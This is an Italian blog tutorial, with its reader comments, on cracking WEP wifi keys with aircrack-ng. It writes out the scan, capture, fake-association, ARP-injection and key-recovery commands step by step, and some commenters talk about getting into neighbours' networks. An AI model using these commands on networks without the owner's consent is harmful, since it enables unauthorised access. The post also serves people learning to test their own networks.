Questa guida è solo a scopo educativo: se volete fare il cracking di una rete wifi protetta, fatelo sulla vostra 
Innanzitutto cerchiamo di capire come si crackka una rete wep. L’attacco si basa fondamentalmente sull’analisi del traffico tra access point (d’ora in avanti “ap”) e client. Ovvero, prima facciamo una scansione delle reti disponibili, poi iniziamo a analizzare il traffico su quella rete (tecnicamente “sniffare”) e così catturare tanti IVS, per poi sottoporli al cracking di aircrack e trovare la chiave.
Passo 1: preparazione
Per prima cosa installiamo aircrack (è consigliata la versione 1.0beta, che velocizza il cracking e offre nuovi strumenti). Poi dobbiamo avere la nostra scheda wifi funzionante, preferibilmente con driver che permetta l’injection (funzione che permette di velocizzare l’operazione). Per maggiori informazioni su questi driver, visitare www.aircrack-ng.org/doku.php?id=install_drivers, oppure (se avete la versione 1.0beta o superiore) basterà usare airdriver-ng per migliorare la ricezione è consigliato dare:
iwconfig <interfaccia> rate 1M
Passo 2: scansione
Facciamo una scansione per vedere le varie reti, su che canale sono e se ci sono client connessi. Per fare questa operazione lanciamo:
airodump-ng <interfaccia>
Una volta individuata la rete segnamoci le seguenti informazioni:
- BSSID dell’AP (colonna di sinistra in alto)
- ESSID dell’AP (nome della rete, colonna di desta in alto)
- Channel (canale)
- SSID del/dei client/s (mac address del/dei client/s, sezione in basso)
Passo 3: sniffing
Ora lanciamo nuovamente airodump-ng con questi paramentri:
airodump-ng -c <canale> -b <BSSID> -w <file.ivs> <interfaccia>
In questo modo catturiamo le informazioni che ci interessano su un file. Per il crack di una rete wep abbiamo bisogno di circa 50.000 ivs, con la nuova versione 1.0beta di aircrack, che sfrutta l’attacco ptw, o dai 250.000 ai 500.000 ivs circa, con le versioni precedenti. Non è possibile stabilire con certezza il numero di ivs necessari… Abbiamo bisogno di un pizzico di fortuna
Passo 4: fake association e injection
Questo passo vale solo per quelli che hanno un driver wifi che permette l’injection (vedi passo 1). Per testare l’injection, lanciare:
aireplay-ng –test <interfaccia>
Ora ci associeremo all’ap e “solleciteremo” la rete in modo da aumentare il numero di ivs al secondo, così in pochi minuti avremo finito di sniffare. Per fare questo, dobbiamo lanciare due volte aireplay, la prima (per la fake association) con:
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <nostro_mac_address> <interfaccia>
La seconda volta con:
aireplay-ng -3 -b <BSSID> -h <nostro_mac_address> <interfaccia>
…e aspettare che faccia il suo lavoro 
Passo 5: cracking della chiave
E una volta finito… Basta avviare aircrack con:
aircrack-ng <file.cap>
e dopo pochi secondi… Eccovi la chiave
Links
http://www.aircrack-ng.org/ – Il sito del progetto aircrack-ng
http://www.aircrack-ng.org/doku.php?id=newbie_guide – Guida per chi è alle prime armi
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack – Cracking wep
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients – Senza clients
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ – L’attacco ptw di aircrack 1.0beta
[...] 16th, 2007 by frafra Ed ecco che arriva il successore dell’articolo cracking-di-una-rete-wifi-con-aircrack. Effettuate il cracking sulla vostra rete, altrimenti viene considerato reato. Questi post sono [...]
Ciao, buon tutorial.. Segnalo un piccolo errore: per il test di aireplay-ng si dà –test (non -test). Alla prox
Toh, pardon, è a posto. Era il font che creava confusione!
Si, wordpress purtroppo fa questi scherzi… mi tocca sempre modificare a mano tutti i simboli speciali e sostituirli con il relativo codice html. Grazie per l’apprezzamento
Iosono digiuno di queste cose,ma bisogna usare il dos? Help me plz, vorrei aganciarmi ale reti ma non iesco neanhe a partire,il wirless sul pc va ok, ma sulle reti protette nonsodavero dove cominciare. Esiste una sequenza più chiara x un neofita comeme? Grazie 100000000 ciao
Questa guida è specifica per sistemi Unix, in particolare Linux, ma dovrebbe funzionare anche sotto Windows, dal prompt dei comandi, ma non ci ho mai provato… Windows è scomparso definitivamente dalle mie macchine da sei anni
Solo una cosa non capisco … a cosa serve prendere nota dell’SSID dei client collegati se poi tali SSID non vengono usati nel seguito ? A me la procedura dopo il secondo comando di injection si ferma perchè comincia a leggere pacchetti ma il numero di ARP rimane sempre 0 e quindi il traffico data su AirDump non aumenta !!!
@rocky, hai ragione, segnarsi il client serve solo nel cracking wpa, quando lo devi fare disconnettere
Sei sicuro che il tuo driver supporti l’injection? E sopratutto, sei sicuro di avere un buon segnale e qualche client connesso?
cosa vuol dire ?
cosa vuol dire interfaccia?
@nikolas
A ogni scheda wifi (normalmente) viene assegnata una interfaccia (sui sistemi *nix, come Linux, BSD, ecc.), un identificativo di quella scheda.
Ciao a tutti una domanda, ma sotto windows, con aireplay l’interfaccia come si chiama?? fatemi un esempio…
io scrivo aireplay ………. poi mi chiede l’interfaccia…vorrei un esempio
@giovanni
Onestamente non lo so, la guida era per sistemi *nix, come linux, bsd, o macos x… Non uso Windows da più di 6 anni…
ciao,
ho installato aircrack versione 1.0beta,
uso 1 scheda con chipset atheros(driver scaricati da wildpackets), come faccio ad avviare airserv-ng.exe??
ho vito il tutorial ke arrivato a -d, scrive “commview.dll:debug”..
io coa devo scrivere??
grazie anticipatamente!!
ps:uso xp
Ciao, ho una domanda: uso i driver wlan-ng, kismet funziona, ma airodump-ng no.
modprobe prism2_usb prism2_doreset=1
sudo wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable
sudo airodump-ng –ivs wlan0 –channel 10 -w cap
Error setting monitor mode on wlan0
sudo iwconfig wlan0 mode monitor
Error for wireless request “Set Mode” (8B06) :
SET failed on device wlan0 ; Operation not supported.
Perchè kismet va? Dove sbaglio?
Ciao, scusate l’ignoranza, ma non sono ancora molto pratico. non riesco ad installare aircrack-ng 1.0 beta. Ho scaricato l’archivio con i sorgenti e il makefile, ma non riesco a compilarlo.
Ho provato col comando make seguito dal percorso del makefile, ma mi dice:
No rule to make target
Qualcuno può darmi un’aiuto?
Grazie 1000
@Jam
Sicuro di essere entrato nella cartella? cmq basta dare make.
Complimenti ottimo articolo…
una precisazione:
se non setti la modalità monitor non ti lascia fare tutti i massi
sudo iwconfig mode monitor
Già, mi ero dimenticato, grazie
Ma per cosa si intende? Inoltre stò usando una penna wifi della hamlet
@Xeenynamo
Spiegati meglio grazie
“Ma per cosa?”
Ho lanciato airdump ng ma mi da un errore con la libreria peek.dll
Ho una scheda con il chipset 3945.
quali sono i drivers da installare?
@Lello
Queste guide sono fatte per chi usa altri sistemi fondamentalmente… Per maggiori informazioni bisogna vedere il wiki di aircrack.
Non uso Windows da circa 7 anni
Ciao Frafra,
innanzitutto grazie x l’ottima guida, è chiara ed efficace…
però ho una domanda:
quando faccio il test per injection ricevo questa rsp
Invalid tods filter. [0,1]
vuol dire che la mia scheda nn supporta questa funzione? eppure i driver scaricati da dove consigli tu sembrano funzionare…ho una scheda intel pro 3945abg
Grazie
@Zocca
Strano… io ho la stessa identica scheda… Che sia un bug? prova ad aggiornare.
sbagliavo io!!! – test invece che –test!!!
grazie mille cmq!!!!!
ciao frafra…
ho un’altra domanda:
come faccio a “patchare” i miei driver per fargli supportare injection in monitor mode?? ho scaricato il file .patch dal sito da te indicato…ma nn so come lavorarci!
..si è capito che sono un neofita???
grazie!
@Zocca
Per la tua scheda devi installare il driver ipwraw-ng. Vedi: http://jackyaway.netsons.org/index.php/2008/01/08/ipw3945-packet-injection/
ciao ho scaricato il prg con il comando sudo apt-get install build-essential e ora mi sono fermato chi pu; aiutarmi uso una live di ubuntu
è proprio la guida che ho seguito…però la mia scheda è collocata nell’interfaccia eth1 e lo script di quella guida è impostato x l’interfaccia wifi0! è sufficente modificare il percorso di installazione dello script?
grazie x l’aiuto!
@zocca metti eth1 al posto di wifi0
Prima di tutto ottima guida.
Secondo, io non ho capito tra il passo 4 e 5 quanto bisogna aspettare dove leggere i risultati,cioè dove trovo i pacchetti ricevuti.
Grazie
ho scaricato aircrack-ng.
ho provato ad aprirlo ma niente.
funziona con VISTA?
salve a tutti.
innanzi tutto ottima guida.
ho un problema. uso ubuntu e una wi-fi broadcom driver bcm43xx. quando eseguo airdump-ng, gredo che, non cattura i pacchetti handshake. ecco cosa mi dice quando eseguo air crack-ng
1 00:90:D0:ED:4B:6F SpeedTouch8350DB WPA (0 handshake)
potete aiutarmi….!
grazie.
ciao a tutti… volevo kiedervi io ho una skeda broadcom e nn trovo i driver giusti compatibili con aircrack mi sapreste dare una mano? grazie
Scusate ho un problema a casa mia c’è questa linea wifi
speedTouch8350. che non è la mia dice che il segnale è libero .Io posso connettermi a questa linea è free gratis ?
Grazie
@tutti
Ragazzi, questo articolo è a scopo informativo. Il cracking è da fare sulla vostra rete, non su quelle altrui, altrimenti ricordo che è reato perseguibile a norma di legge.
Non è nemmeno un articolo atto a risolvere i problemi relativi ai driver delle schede wifi.
Inoltre non chiedetemi aiuto se siete sotto sistemi Windows, in quanto questo articolo è studiato per sistemi come Linux, BSD, ecc., e non ho una macchina con Windows sopra da 7 anni.
@virgi
(vedi sopra) comunque per la legge italiana le persone che accedono devono fornire i propri dati al “gestore del servizio”, quindi niente accessi anonimi (vedi come accade negli hotels ecc.)
Ciao grande guida complimenti. Senti mi puoi aiutare : ho una TP-WN321G con chipset rt73 (148f:2573 Ralink Technology, Corp) che driver devo usare??
Quelli nel sito di aircrak non riesco a compilarli…. la mia distro è Arch Linux.
vorrei sapere perche il mio vicino ha un ruter wireless senza nessuna protezione e quando tento di connettermi non riesco a entrare pur avendo un buon segnale. grazie
Forse ho chiesto la luna……… zero risposte in un mese. Affanculo pure a voi
x il sistema windows..basta scaricare winaircrack…
E’ possibile interrompere la cattura dei pacchetti e riprenderla in un secondo momento?
Ho provato a dare lo stesso nome al file cap ma ne crea lo stesso di nuovi.
Come faccio a capire che posso fare il packet Injection?
sudo aireplay-ng -test wlan0
Invalid tods filter. [0,1]
“aireplay-ng –help” for help.
scusa ma nel passo 3:sniffing cosa intende per -w??
-w file.ivs *
scusa se continuo a mandare messaggi ma per 50.000 ivs cosa intendi?? i beacon??
Il numero degli IVS corrisponde al numero scritto sotto #Data
Se non usi l’injection ti ci vuole un sacco di tempo …
ciao frafra….io ho trovato la password di una WEP (tranquillo è di un mio amico), e aircrack mi ha trovato questa chiave esadecimale:
KEY FOUND! [ 4B:C3:D5:5C:00 ]
Decrypted correctly: 100%
I rispettivi valori in ASCII non ci sono…..come faccio a connettermi????
P.S. Ho Ubuntu 8.10
Ringrazio già per l’aiuto…
vi prego aggiungetemi su shavo_s.o.a.d_91@hotmail.it su msn. mi serve il vostro aiuto. li la cnversazione è in tempo reale
vi prego aggiungetemi su msn…ma cè qualcn qui dentro?
ciao a tutti, sono riuscito a trovare una chiave wep ma è in esadecimale; come faccio a farla riconoscere???
La devo in qualche modo deocodificare??
ciao grazie mille
Ho seguito la guida, inizialmente devo abilitare il monitor mode con :
sudo airmon-ng start wlan0
e mi crea un nuovo device di nome mon0
purtroppo ho problemi al passo della fake auth.
l’injection mode mi funziona
ora vedo se riesco a raccogliere un pò di traffico
ciao ragazzi , mi sapreste dire perchè quando provo a lanciare airodump-ng.exe come da passo 2 mi da un messagio che dice che mancano alcuni driver nello specifico peek.dll e peek5.sys……. qualcuno mi aiuta nella procedura.
grazie
ciao buon frassi…ho notato che qui dai risposte più esaurienti che su msn…quindi te lo chiedo da qui xd:
inanzi tutto: cosa devo scrivere al posto di interfaccia?
2) come faccio a capire che scheda wireless ho visto che ce l’gia nel pc?
3)riuscirò mai a capirci qualcosa di ’sta roba?
@l’incubo di frassi
Per vedere la tua interfaccia wireless, digita iwconfig.
Per sapere che scheda wireless è, digita lspci (o lsusb)
Per la tre… si dai
[...] la documentazione ho cercato su google e ho seguito i passi di questo articolo che si trova sui primi risultati di [...]
@dieghen89
Per me non ha molto senso. La conversione dovrebbe essere:
KÃÕ\�
è possibile farlo con mac os x con un macbook pro e con la scheda wifi Broadcom BCM43xx se si rispondetemi devo crackare una rete wep
Vorrei aggiungere una risorsa che mi è sembrata utilissima riguardo il cracking delle reti wep.
Tra l’altro ad oggi mi sembra la guida più semplice e completa che si trovi in rete (almeno in lingua italiana).
Il link è questo …
Magari a qualcuno risulta utile come lo è stata per me…
Ho letto il tono dei vari commenti, tra cui uno pure offensivo.
Non sono un hacker ma ho notato carenze nell’utilizzare i vari airodump e nelle conoscenze di base del sistema (scordatevi Windows) tanto da arrivare a pensare che basti premere un pulsante e il gioco è fatto.
Vorrei ricordare che crackare una rete wireless senza il consenso del proprietario è ILLEGALE, è un REATO e come tale PUNIBILE DALLA LEGGE ! Ovviamente chi ha scritto il tutorial è nettamente più esperto della media e giustamente non ha neppure accennato alle varie operazioni/settaggi necessarie a non farsi rintracciare. Spero che vi rendiate conto di cosa rischiate solo per usare a sbafo la connessione del vicino….
BLA BLA BLA PARLA QUANTO VUOI MA NESSUNO TI DARÀ ASCOLTO, COME DETTO DALL’AUTORE DELLA GUIDA NON SI ASSUME RESPONSABILITÀ SU COME VIENE UTILIZZATA, TI PIACE O NO NON C’ERA BISOGNO DI SCRIVERE